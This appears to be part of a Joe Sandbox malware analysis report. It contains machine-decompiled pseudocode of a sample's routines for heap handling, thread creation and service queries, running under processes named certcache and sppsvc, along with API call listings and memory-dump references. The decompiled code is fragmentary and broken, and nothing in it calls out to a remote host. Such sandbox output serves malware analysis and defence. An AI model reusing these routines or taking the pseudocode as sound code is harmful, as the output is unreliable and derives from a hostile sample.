    					asm("adc eax, 0x13c178");
    					while(1) {
    						L17:
    						HeapFree(GetProcessHeap(), 0, _t45);
    						while(1) {
    							L1:
    							_t44 =  *((intOrPtr*)(_t47 - 4));
    							L2:
    							_t41 = 0;
    							_t37 = 0;
    							 *(_t47 - 8) = 0;
    							_t36 = 0x80;
    							if(_t46 < _t44) {
    								while(1) {
    									L3:
    									_t36 =  *_t46;
    									_t46 = _t46 + 1;
    									_t41 = _t41 | (_t36 & 0x7f) << _t37;
    									if(_t36 >= 0) {
    										break;
    									}
    									L4:
    									_t37 = _t37 + 7;
    									if(_t46 < _t44) {
    										continue;
    									}
    									break;
    								}
    								L5:
    								 *(_t47 - 8) = _t41;
    							}
    							L6:
    							_t21 =  !((_t36 & 0x000000ff) >> 7);
    							if((_t21 & 0x00000001) != 0) {
    								L7:
    								_t21 = _t41 + _t46;
    								if(_t21 <= _t44) {
    									L8:
    									 *(_t47 - 0xc) = _t46;
    									_t42 = _t47 - 0x18;
    									_t38 = _t47 - 0xc;
    									_t46 = _t21;
    									_t21 = L00138800(_t47 - 0xc, _t47 - 0x18);
    									if(_t21 != 0) {
    										L9:
    										_t45 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
    										if(_t45 == 0) {
    											L1:
    											_t44 =  *((intOrPtr*)(_t47 - 4));
    											goto L2;
    										} else {
    											L10:
    											goto 0x141775;
    											asm("int3");
    											L11:
    											_t27 = L00131F70(_t23, _t38, _t42);
    											 *((intOrPtr*)(_t45 + 8)) = _t27;
    											if(_t27 == 0) {
    												L17:
    												HeapFree(GetProcessHeap(), 0, _t45);
    												continue;
    											} else {
    												L12:
    												_t30 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
    												 *((intOrPtr*)(_t45 + 0xc)) = _t30;
    												if(_t30 == 0) {
    													L16:
    													goto 0x1417a5;
    													asm("int3");
    													asm("int3");
    													_push( *((intOrPtr*)(_t45 + 8)));
    													goto L0;
    												} else {
    													L13:
    													goto 0x141789;
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													L14:
    													asm("lahf");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													_t31 = CreateThread(??, ??, ??, ??, ??, ??);
    													 *(_t45 + 0x10) = _t31;
    													if(_t31 == 0) {
    														goto L16;
    													} else {
    														L15:
    														 *((intOrPtr*)(_t45 + 4)) =  *((intOrPtr*)(_t47 - 0x18));
    														_t33 =  *0x13c274; // 0x0
    														 *_t45 = _t33;
    														 *0x13c274 = _t45;
    														do {
    															goto L1;
    														} while (_t45 == 0);
    														goto L10;
    													}
    												}
    											}
    										}
    										L19:
    									}
    								}
    							}
    							L18:
    							goto 0x1417ba;
    							asm("int3");
    							return _t21;
    						}
    					}
    				}
    			}
















    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00138A45
    • RtlAllocateHeap.NTDLL(00000000), ref: 00138A4C
    • GetProcessHeap.KERNEL32(00000000), ref: 00138ABE
    • HeapFree.KERNEL32(00000000), ref: 00138AC5
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 76%
    			E0013850C(intOrPtr __ecx, void* __edx, long* __edi) {
    				void* _t4;
    				void* _t9;
    				void* _t17;
    				void* _t19;
    
    				_t9 = __edx;
    				 *((intOrPtr*)(_t19 - 4)) = __ecx;
    				_t4 = RtlAllocateHeap(GetProcessHeap(), 0,  *__edi);
    				_t17 = _t4;
    				if(_t17 == 0) {
    					L4:
    					goto 0x1415de;
    					asm("int3");
    					return _t4;
    				} else {
    					_push(_t9);
    					_push( *((intOrPtr*)(_t19 - 4)));
    					if(L00132DB0(_t17, __edi) == 0) {
    						_t4 = _t17;
    						goto L4;
    					} else {
    						HeapFree(GetProcessHeap(), 0, _t17);
    						return 0;
    					}
    				}
    			}








    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 00138515
    • RtlAllocateHeap.NTDLL(00000000), ref: 0013851C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0013853F
    • HeapFree.KERNEL32(00000000), ref: 00138546
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 100%
    			E0013A7A0(long __ecx) {
    				int _t3;
    				long _t7;
    				void* _t9;
    				void* _t10;
    
    				_t10 =  *0x13cbd4; // 0x0
    				_t7 = __ecx;
    				_t9 = 0x13cbd4;
    				while(_t10 != 0) {
    					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
    					if(_t3 == 0x102) {
    						_t9 = _t10;
    					} else {
    						 *_t9 =  *_t10;
    						CloseHandle( *(_t10 + 8));
    						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
    					}
    					_t10 =  *_t9;
    				}
    				return _t3;
    			}








    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0013A7B8
    • CloseHandle.KERNEL32(?), ref: 0013A7CC
    • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00138F95), ref: 0013A7D5
    • HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0013A7DC
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • _snprintf.NTDLL ref: 00139642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 0013964E
    • HeapFree.KERNEL32(00000000), ref: 00139655
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • OpenServiceW.ADVAPI32(?,?,00000001), ref: 0013989D
    • QueryServiceConfig2W.ADVAPI32 ref: 001398EC
    • GetProcessHeap.KERNEL32(00000000), ref: 001398FB
    • HeapFree.KERNEL32(00000000), ref: 00139902
    • CloseServiceHandle.ADVAPI32 ref: 00139909
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 73%
    			E0013891E(unsigned char* __eax, long __ebx, void* __edi, void* __esi) {
    				long _t10;
    				long _t12;
    				void* _t14;
    				void* _t17;
    
    				L0:
    				while(1) {
    					L0:
    					_t14 = __edi;
    					_t12 = __ebx;
    					 *__eax =  *__eax >> 1;
    					 *__eax =  *__eax;
    					VirtualFree( *(__esi + 8), 0, ??);
    					CloseHandle( *(__esi + 0x10));
    					 *__edi =  *__esi;
    					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
    					while(1) {
    						L4:
    						_t17 =  *_t14;
    						if(_t17 == 0) {
    							break;
    						}
    						L1:
    						_t10 = WaitForSingleObject( *(_t17 + 0x10), _t12);
    						if(_t10 == 0x102) {
    							L3:
    							_t14 = _t17;
    						} else {
    							L2:
    							goto 0x141734;
    							asm("int3");
    							asm("int3");
    							_push( *((intOrPtr*)(_t17 + 8)));
    							goto L0;
    						}
    					}
    					L5:
    					return _t10;
    					L6:
    				}
    			}








    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00138908
    • VirtualFree.KERNEL32(?,00000000), ref: 0013892B
    • CloseHandle.KERNEL32(?), ref: 00138934
    • GetProcessHeap.KERNEL32(00000000), ref: 00138941
    • HeapFree.KERNEL32(00000000), ref: 00138948
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 73%
    			E00138B2C(unsigned char* __eax, void* __ebx, void* __edi, void* __esi) {
    				long _t10;
    				void* _t13;
    				void* _t16;
    
    				L0:
    				while(1) {
    					L0:
    					_t13 = __edi;
    					 *__eax =  *__eax >> 1;
    					 *__eax =  *__eax;
    					VirtualFree( *(__esi + 8), 0, ??);
    					CloseHandle( *(__esi + 0x10));
    					 *__edi =  *__esi;
    					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
    					while(1) {
    						L4:
    						_t16 =  *_t13;
    						if(_t16 == 0) {
    							break;
    						}
    						L1:
    						_t10 = WaitForSingleObject( *(_t16 + 0x10), 0xffffffff);
    						if(_t10 == 0x102) {
    							L3:
    							_t13 = _t16;
    						} else {
    							L2:
    							goto 0x1417f6;
    							asm("int3");
    							asm("int3");
    							_push( *((intOrPtr*)(_t16 + 8)));
    							goto L0;
    						}
    					}
    					L5:
    					return _t10;
    					L6:
    				}
    			}







    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00138B16
    • VirtualFree.KERNEL32(?,00000000), ref: 00138B39
    • CloseHandle.KERNEL32(?), ref: 00138B42
    • GetProcessHeap.KERNEL32(00000000), ref: 00138B4F
    • HeapFree.KERNEL32(00000000), ref: 00138B56
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Executed Functions

    Non-executed Functions

    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.715405067.000000000031E000.00000004.sdmp, Offset: 0031E000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_31e000_sppsvc.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.715472830.000000000034D000.00000004.sdmp, Offset: 0034D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_34d000_sppsvc.jbxd
    Memory Dump Source
    • Source File: 00000008.00000002.715543725.0000000000385000.00000004.sdmp, Offset: 00385000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_385000_sppsvc.jbxd
    Memory Dump Source
    • Source File: 00000008.00000002.715586734.00000000003A1000.00000004.sdmp, Offset: 003A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_3a1000_sppsvc.jbxd